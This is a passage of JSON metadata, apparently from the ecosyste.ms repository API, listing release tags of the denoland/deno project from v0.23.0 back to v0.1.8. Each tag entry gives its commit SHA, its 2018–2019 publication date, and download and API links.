dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts